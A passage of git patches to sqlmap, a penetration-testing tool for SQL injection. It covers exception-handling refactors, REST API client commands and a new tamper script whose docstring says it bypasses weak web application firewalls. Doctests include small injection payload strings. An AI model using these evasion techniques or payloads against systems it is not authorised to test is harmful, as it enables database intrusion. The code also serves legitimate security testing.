overrideOptions): inputOptions = base64unpickle(inputOptions.pickledOptions) except Exception, ex: errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions - errMsg += " ('%s')" % ex.message if ex.message else "" + errMsg += " ('%s')" % ex if ex.message else "" raise SqlmapSyntaxException(errMsg) if inputOptions.configFile: diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index dbbc5ad78..d18f87454 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py @@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission """ from lib.core.common import checkFile +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import openFile from lib.core.common import unArrayizeValue @@ -67,7 +68,7 @@ def configFileParser(configFile): config = UnicodeRawConfigParser() config.readfp(configFP) except Exception, ex: - errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message + errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) raise SqlmapSyntaxException(errMsg) if not config.has_section("Target"): diff --git a/lib/request/connect.py b/lib/request/connect.py index 76b1afdf8..b5b716bbc 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -40,6 +40,7 @@ from lib.core.common import getCurrentThreadData from lib.core.common import getHeader from lib.core.common import getHostHeader from lib.core.common import getRequestHeader +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import logHTTPTraffic from lib.core.common import pushValue @@ -497,22 +498,22 @@ class Connect(object): if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() - except Exception, msg: - warnMsg = "problem occurred during connection closing ('%s')" % msg + except Exception, ex: + warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) logger.warn(warnMsg) - except urllib2.HTTPError, e: + except urllib2.HTTPError, ex: page = None responseHeaders = None try: - page = e.read() if not skipRead else None - responseHeaders = e.info() - responseHeaders[URI_HTTP_HEADER] = e.geturl() + page = ex.read() if not skipRead else None + responseHeaders = ex.info() + responseHeaders[URI_HTTP_HEADER] = ex.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code + warnMsg += "to get error page information (%d)" % ex.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: @@ -522,13 +523,13 @@ class Connect(object): finally: page = page if isinstance(page, unicode) else getUnicode(page) - code = e.code + code = ex.code kb.originalCode = kb.originalCode or code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - status = getUnicode(e.msg) + status = getUnicode(ex.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: @@ -545,11 +546,11 @@ class Connect(object): logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - if e.code == httplib.UNAUTHORIZED and not conf.ignore401: + if ex.code == httplib.UNAUTHORIZED and not conf.ignore401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise SqlmapConnectionException(errMsg) - elif e.code == httplib.NOT_FOUND: + elif ex.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise SqlmapConnectionException(errMsg) @@ -557,11 +558,11 @@ class Connect(object): debugMsg = "page not found (%d)" % code singleTimeLogMessage(debugMsg, logging.DEBUG) processResponse(page, responseHeaders) - elif e.code == httplib.GATEWAY_TIMEOUT: + elif ex.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: - warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code]) + warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) @@ -575,7 +576,7 @@ class Connect(object): debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) - except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e: + except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException): tbMsg = traceback.format_exc() if "no host given" in tbMsg: @@ -718,7 +719,7 @@ class Connect(object): payload = function(payload=payload, headers=auxHeaders) except Exception, ex: errMsg = "error occurred while running tamper " - errMsg += "function '%s' ('%s')" % (function.func_name, ex) + errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex)) raise SqlmapGenericException(errMsg) if not isinstance(payload, basestring): diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index 08e6b4193..0ade4aca4 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -9,6 +9,7 @@ import httplib import socket import urllib2 +from lib.core.common import getSafeExString from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -57,7 +58,7 @@ class HTTPSConnection(httplib.HTTPSConnection): sock.close() except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % ex.message) + logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni @@ -77,7 +78,7 @@ class HTTPSConnection(httplib.HTTPSConnection): sock.close() except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % ex.message) + logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) if not success: raise SqlmapConnectionException("can't establish SSL connection") diff --git a/lib/utils/api.py b/lib/utils/api.py index caa46c188..45eb46be8 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -17,6 +17,7 @@ import time import urllib2 from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import unArrayizeValue from lib.core.convert import base64pickle from lib.core.convert import hexencode @@ -87,7 +88,7 @@ class Database(object): else: self.cursor.execute(statement) except sqlite3.OperationalError, ex: - if not "locked" in ex.message: + if not "locked" in getSafeExString(ex): raise else: break diff --git a/lib/utils/google.py b/lib/utils/google.py index 7849befbb..8ee1ba99c 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -12,6 +12,7 @@ import socket import urllib import urllib2 +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import readInput from lib.core.common import urlencode @@ -50,7 +51,7 @@ class Google(object): conn = self.opener.open("http://www.google.com/ncr") conn.info() # retrieve session cookie except Exception, ex: - errMsg = "unable to connect to Google ('%s')" % ex.message + errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) raise SqlmapConnectionException(errMsg) def search(self, dork): diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 81af27026..e0a0a0c50 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -44,6 +44,7 @@ from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getFileItems from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import normalizeUnicode @@ -771,7 +772,7 @@ def dictionaryAttack(attack_dict): except Exception, ex: warnMsg = "there was a problem while loading dictionaries" - warnMsg += " ('%s')" % ex.message + warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 3f20432d9..555be564b 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -11,6 +11,7 @@ import sqlite3 import threading import time +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import serializeObject from lib.core.common import unserializeObject @@ -77,7 +78,7 @@ class HashDB(object): for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): retVal = row[0] except sqlite3.OperationalError, ex: - if not "locked" in ex.message: + if not "locked" in getSafeExString(ex): raise except sqlite3.DatabaseError, ex: errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, ex) @@ -127,7 +128,7 @@ class HashDB(object): if retries == 0: warnMsg = "there has been a problem while writing to " - warnMsg += "the session file ('%s')" % ex.message + warnMsg += "the session file ('%s')" % getSafeExString(ex) logger.warn(warnMsg) if retries >= HASHDB_FLUSH_RETRIES: diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 125aa8226..1d9e770b7 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -12,6 +12,7 @@ from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import clearConsoleLine from lib.core.common import getLimitRange +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isInferenceAvailable from lib.core.common import isListLike @@ -341,13 +342,13 @@ class Entries: attackDumpedTable() except (IOError, OSError), ex: errMsg = "an error occurred while attacking " - errMsg += "table dump ('%s')" % ex.message + errMsg += "table dump ('%s')" % getSafeExString(ex) logger.critical(errMsg) conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException, ex: errMsg = "connection exception detected in dumping phase " - errMsg += "('%s')" % ex.message + errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally: diff --git a/sqlmap.py b/sqlmap.py index 6bb12a56f..d7bf52912 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -25,6 +25,7 @@ from lib.controller.controller import start from lib.core.common import banner from lib.core.common import createGithubIssue from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import maskSensitiveData from lib.core.common import setPaths @@ -119,7 +120,7 @@ def main(): cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) logger.critical(errMsg) sys.exit(1) diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py index cb8e91630..152e028ce 100644 --- a/tamper/symboliclogical.py +++ b/tamper/symboliclogical.py @@ -19,7 +19,7 @@ def tamper(payload, **kwargs): Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) >>> tamper("1 AND '1'='1") - '1 && '1'='1' + "1 %26%26 '1'='1" """ retVal = payload From c05c0ff4356dfdf62f30350df456275c562d7540 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:55:49 +0200 Subject: [PATCH 15/92] Minor patch with imports --- lib/controller/controller.py | 1 - lib/core/option.py | 1 + lib/core/target.py | 1 - 3 files changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 0e82a7c23..e557c6ac1 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -25,7 +25,6 @@ from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import getPublicTypeMembers from lib.core.common import getSafeExString -from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import intersect diff --git a/lib/core/option.py b/lib/core/option.py index e9d4331b9..e2157806a 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -34,6 +34,7 @@ from lib.core.common import boldifyMessage from lib.core.common import checkFile from lib.core.common import dataToStdout from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import extractRegexResult from lib.core.common import filterStringValue from lib.core.common import findPageForms diff --git a/lib/core/target.py b/lib/core/target.py index cdfd538f0..98101d433 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -39,7 +39,6 @@ from lib.core.enums import POST_HINT from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException from lib.core.option import _setDBMS From c4f9e66a6fc9fea719a5b49bcd7b4431983c4563 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 16:21:31 +0200 Subject: [PATCH 16/92] Patch related to the #1403 --- lib/core/common.py | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index de7ce354c..fc91fff44 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -909,14 +909,15 @@ def readInput(message, default=None, checkBatch=True): answer = item.split('=')[1] if len(item.split('=')) > 1 else None if answer and question.lower() in message.lower(): retVal = getUnicode(answer, UNICODE_ENCODING) + elif answer is None and retVal: + retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING)) - infoMsg = "%s%s" % (message, retVal) - logger.info(infoMsg) + if retVal: + infoMsg = "%s%s" % (message, retVal) + logger.info(infoMsg) - debugMsg = "used the given answer" - logger.debug(debugMsg) - - break + debugMsg = "used the given answer" + logger.debug(debugMsg) if retVal is None: if checkBatch and conf.get("batch"): From f89ce2173f736fc6a51a86ccc4473fa245546c32 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 12 Sep 2015 15:13:30 +0200 Subject: [PATCH 17/92] Fixes #1404 --- lib/request/connect.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index b5b716bbc..b1ecf8f23 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -5,6 +5,7 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import binascii import compiler import httplib import json @@ -576,7 +577,7 @@ class Connect(object): debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) - except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException): + except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException): tbMsg = traceback.format_exc() if "no host given" in tbMsg: From 5ce3306114e70edb8ee049a3fb8f083ef75b3fa2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 13 Sep 2015 14:47:27 +0200 Subject: [PATCH 18/92] Adding new tamper script (Issue #1247) --- tamper/uppercase.py | 46 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 tamper/uppercase.py diff --git a/tamper/uppercase.py b/tamper/uppercase.py new file mode 100644 index 000000000..1a1af3a35 --- /dev/null +++ b/tamper/uppercase.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each keyword character with upper case value + + Tested against: + * Microsoft SQL Server 2005 + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that has poorly written permissive regular expressions + * This tamper script should work against all (?) databases + + >>> tamper('insert') + 'INSERT' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"[A-Za-z_]+", retVal): + word = match.group() + + if word.upper() in kb.keywords: + retVal = retVal.replace(word, word.upper()) + + return retVal From 1417decdf1c7b284cd714bcb3bfe26a1da14839f Mon Sep 17 00:00:00 2001 From: daremon Date: Mon, 14 Sep 2015 17:31:02 +0300 Subject: [PATCH 19/92] Added commands stop, kill, list to API client --- lib/utils/api.py | 33 ++++++++++++++++++++++++--------- 1 file changed, 24 insertions(+), 9 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 45eb46be8..d66097261 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -368,18 +368,19 @@ def task_delete(taskid): ################### +@get("/admin/list") @get("/admin//list") -def task_list(taskid): +def task_list(taskid=None): """ List task pull """ - if is_admin(taskid): - logger.debug("[%s] Listed task pool" % taskid) + logger.debug("[%s] Listed task pool") + if taskid is not None: tasks = list(DataStore.tasks) - return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) else: - logger.warning("[%s] Unauthorized call to task_list()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + tasks = {x: dejsonize(scan_status(x))['status'] + for x in list(DataStore.tasks)} + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) @get("/admin//flush") @@ -475,7 +476,9 @@ def scan_stop(taskid): """ Stop a scan """ - if taskid not in DataStore.tasks: + if (taskid not in DataStore.tasks or + DataStore.tasks[taskid].engine_process() is None or + DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -490,7 +493,9 @@ def scan_kill(taskid): """ Kill a scan """ - if taskid not in DataStore.tasks: + if (taskid not in DataStore.tasks or + DataStore.tasks[taskid].engine_process() is None or + DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -691,7 +696,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): print break - if command.lower() in ("data", "log", "status"): + if command.lower() in ("data", "log", "status", "stop", "kill"): if not taskid: logger.error("No task ID in use") continue @@ -743,6 +748,13 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): continue logger.info("Switching to task ID '%s' " % taskid) + elif command.lower() == "list": + raw = _client(addr + "/admin/list") + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command " + command) + dataToStdout("%s\n" % raw) + elif command.lower() in ("exit", "bye", "quit", 'q'): return @@ -753,6 +765,9 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): msg += "data Retrieve and show data for current task\n" msg += "log Retrieve and show log for current task\n" msg += "status Retrieve and show status for current task\n" + msg += "stop Stop current task\n" + msg += "kill Kill current task\n" + msg += "list Display all tasks\n" msg += "exit Exit this client\n" dataToStdout(msg) From 5de1825d0c94dc5dc2093acadf74fd1474248c1e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 Sep 2015 10:48:23 +0200 Subject: [PATCH 20/92] Fixes #1412 --- lib/request/connect.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index b1ecf8f23..19ae69301 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -630,7 +630,7 @@ class Connect(object): raise SqlmapConnectionException(warnMsg) finally: - if not isinstance(page, unicode): + if isinstance(page, basestring) and not isinstance(page, unicode): if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): page = unicode(page, errors="ignore") else: From ee3857444906354f4c596b2bd38a3ddf833b9bea Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 Sep 2015 13:26:25 +0200 Subject: [PATCH 21/92] Fixes #1411 --- lib/core/common.py | 4 ++-- lib/core/replication.py | 19 +++++++++++++------ 2 files changed, 15 insertions(+), 8 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index fc91fff44..78a64892b 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3979,7 +3979,7 @@ def pollProcess(process, suppress_errors=False): break -def getSafeExString(ex): +def getSafeExString(ex, encoding=None): """ Safe way how to get the proper exception represtation as a string (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) @@ -3992,4 +3992,4 @@ def getSafeExString(ex): elif getattr(ex, "msg", None): retVal = ex.msg - return getUnicode(retVal) + return getUnicode(retVal, encoding=encoding) diff --git a/lib/core/replication.py b/lib/core/replication.py index c5bbd24cc..476604598 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -8,9 +8,11 @@ See the file 'doc/COPYING' for copying permission import sqlite3 from extra.safe2bin.safe2bin import safechardecode +from lib.core.common import getSafeExString from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapValueException +from lib.core.settings import UNICODE_ENCODING class Replication(object): """ @@ -49,11 +51,16 @@ class Replication(object): self.name = unsafeSQLIdentificatorNaming(name) self.columns = columns if create: - self.execute('DROP TABLE IF EXISTS "%s"' % self.name) - if not typeless: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) - else: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + try: + self.execute('DROP TABLE IF EXISTS "%s"' % self.name) + if not typeless: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) + else: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + except Exception, ex: + errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING) + errMsg += "located at '%s'" % self.parent.dbpath + raise SqlmapGenericException(errMsg) def insert(self, values): """ @@ -70,7 +77,7 @@ class Replication(object): try: self.parent.cursor.execute(sql, parameters) except sqlite3.OperationalError, ex: - errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex) + errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath errMsg += "it's not used by some other program" raise SqlmapGenericException(errMsg) From 058870635b38b5dc762fb99e530d70b397a39b97 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 Sep 2015 14:37:30 +0200 Subject: [PATCH 22/92] Update for an #1414 --- lib/utils/api.py | 27 +++++++++++++++++---------- 1 file changed, 17 insertions(+), 10 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 45eb46be8..21068bb96 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -116,7 +116,8 @@ class Database(object): class Task(object): - def __init__(self, taskid): + def __init__(self, taskid, remote_addr): + self.remote_addr = remote_addr self.process = None self.output_directory = None self.options = None @@ -343,7 +344,9 @@ def task_new(): Create new task ID """ taskid = hexencode(os.urandom(8)) - DataStore.tasks[taskid] = Task(taskid) + remote_addr = request.remote_addr + + DataStore.tasks[taskid] = Task(taskid, remote_addr) logger.debug("Created new task: '%s'" % taskid) return jsonize({"success": True, "taskid": taskid}) @@ -374,13 +377,15 @@ def task_list(taskid): List task pull """ if is_admin(taskid): - logger.debug("[%s] Listed task pool" % taskid) tasks = list(DataStore.tasks) - return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) else: - logger.warning("[%s] Unauthorized call to task_list()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + tasks = [] + for key in DataStore.tasks: + if DataStore.tasks[key].remote_addr == request.remote_addr: + tasks.append(key) + logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) @get("/admin//flush") def task_flush(taskid): @@ -389,11 +394,13 @@ def task_flush(taskid): """ if is_admin(taskid): DataStore.tasks = dict() - logger.debug("[%s] Flushed task pool" % taskid) - return jsonize({"success": True}) else: - logger.warning("[%s] Unauthorized call to task_flush()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + for key in list(DataStore.tasks): + if DataStore.tasks[key].remote_addr == request.remote_addr: + del DataStore.tasks[key] + + logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + return jsonize({"success": True}) ################################## # sqlmap core interact functions # From c59ead36cee6f792f3fe6b5d2bcc4729eba3dffb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 Sep 2015 17:23:59 +0200 Subject: [PATCH 23/92] Patch for Python 2.6 (SyntaxError) --- lib/utils/api.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 21068bb96..c73adaec8 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -721,7 +721,9 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): taskid = None continue - cmdLineOptions = { k: v for k, v in cmdLineOptions.iteritems() if v is not None } + for key in list(cmdLineOptions): + if cmdLineOptions[key] is None: + del cmdLineOptions[key] raw = _client(addr + "/task/new") res = dejsonize(raw) From c2fb2161d34e21f6cece0e3d5069c4c9c78bdd76 Mon Sep 17 00:00:00 2001 From: daremon Date: Wed, 16 Sep 2015 00:15:16 +0300 Subject: [PATCH 24/92] Added flush command --- lib/utils/api.py | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 7a73905a8..09aac2c5a 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -698,12 +698,12 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): while True: try: - command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() + command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower() except (EOFError, KeyboardInterrupt): print break - if command.lower() in ("data", "log", "status", "stop", "kill"): + if command in ("data", "log", "status", "stop", "kill"): if not taskid: logger.error("No task ID in use") continue @@ -713,7 +713,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): logger.error("Failed to execute command " + command) dataToStdout("%s\n" % raw) - elif command.lower().startswith("new"): + elif command.startswith("new"): if ' ' not in command: logger.error("Program arguments are missing") continue @@ -745,7 +745,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): continue logger.info("Scanning started") - elif command.lower().startswith("use"): + elif command.startswith("use"): taskid = (command.split()[1] if ' ' in command else "").strip("'\"") if not taskid: logger.error("Task ID is missing") @@ -757,17 +757,17 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): continue logger.info("Switching to task ID '%s' " % taskid) - elif command.lower() == "list": - raw = _client(addr + "/admin/0/list") + elif command in ("list", "flush"): + raw = _client(addr + "/admin/0/" + command) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command " + command) dataToStdout("%s\n" % raw) - elif command.lower() in ("exit", "bye", "quit", 'q'): + elif command in ("exit", "bye", "quit", 'q'): return - elif command.lower() in ("help", "?"): + elif command in ("help", "?"): msg = "help Show this help message\n" msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" @@ -777,6 +777,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): msg += "stop Stop current task\n" msg += "kill Kill current task\n" msg += "list Display all tasks\n" + msg += "flush Flush tasks (delete all tasks)\n" msg += "exit Exit this client\n" dataToStdout(msg) From 2cea977e1278a6341efe984f8ef5ed8f665472cd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 Sep 2015 14:58:01 +0200 Subject: [PATCH 25/92] Fixes #1415 --- lib/core/common.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index 78a64892b..205f62864 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3871,13 +3871,18 @@ def decloakToTemp(filename): """ content = decloak(filename) - _ = os.path.split(filename[:-1])[-1] + + _ = utf8encode(os.path.split(filename[:-1])[-1]) + prefix, suffix = os.path.splitext(_) prefix = prefix.split(os.extsep)[0] + handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) os.close(handle) + with open(filename, "w+b") as f: f.write(content) + return filename def prioritySortColumns(columns): From 65a8f0fe326bbafed2f67991ad084103fe656333 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 Sep 2015 15:25:40 +0200 Subject: [PATCH 26/92] Minor enhancement --- lib/request/connect.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index 19ae69301..fe7c4cd23 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -891,7 +891,7 @@ class Connect(object): if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER - variables = {"uri": uri, "lastPage": threadData.lastPage} + variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals()} originals = {} keywords = keyword.kwlist From aa2112b3603ed7f87e66f33049c0b927c983ec9e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 Sep 2015 16:18:58 +0200 Subject: [PATCH 27/92] Update for #1414 --- lib/utils/api.py | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 09aac2c5a..d8a38bf1e 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -661,7 +661,7 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): def _client(url, options=None): - logger.debug("Calling " + url) + logger.debug("Calling %s" % url) try: data = None if options is not None: @@ -671,7 +671,7 @@ def _client(url, options=None): text = response.read() except: if options: - 